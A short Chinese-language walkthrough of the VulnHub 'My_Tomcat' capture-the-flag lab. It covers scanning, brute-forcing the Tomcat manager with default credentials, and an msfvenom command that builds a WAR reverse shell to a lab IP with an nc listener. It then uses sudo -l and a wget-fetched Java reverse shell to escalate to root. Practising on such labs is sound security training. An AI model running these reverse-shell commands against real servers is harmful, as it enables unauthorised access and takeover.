vulnhub My_Tomcat
内网扫描发现目标主机
目标IP 192.168.33.139
扫描端口服务
22 ssh openssh 6.6.1
8080 是apache tomcat
登录进去 使用bp的**
需要设置bses64加密后进行**
tomcat:tomcat
使用,msfveom制作war的反弹shell
msfvenom -p java/shell_reverse_tcp lhost=192.168.33.138 lport=12345 -f war > 1.war
nc -nvlp 12345 接收
sudo -l查看到无密码的root权限命令
制作一个java的反弹shell nc接收
simplehttpserver模块 wget接收 要在tmp目录下接收并赋予执行权限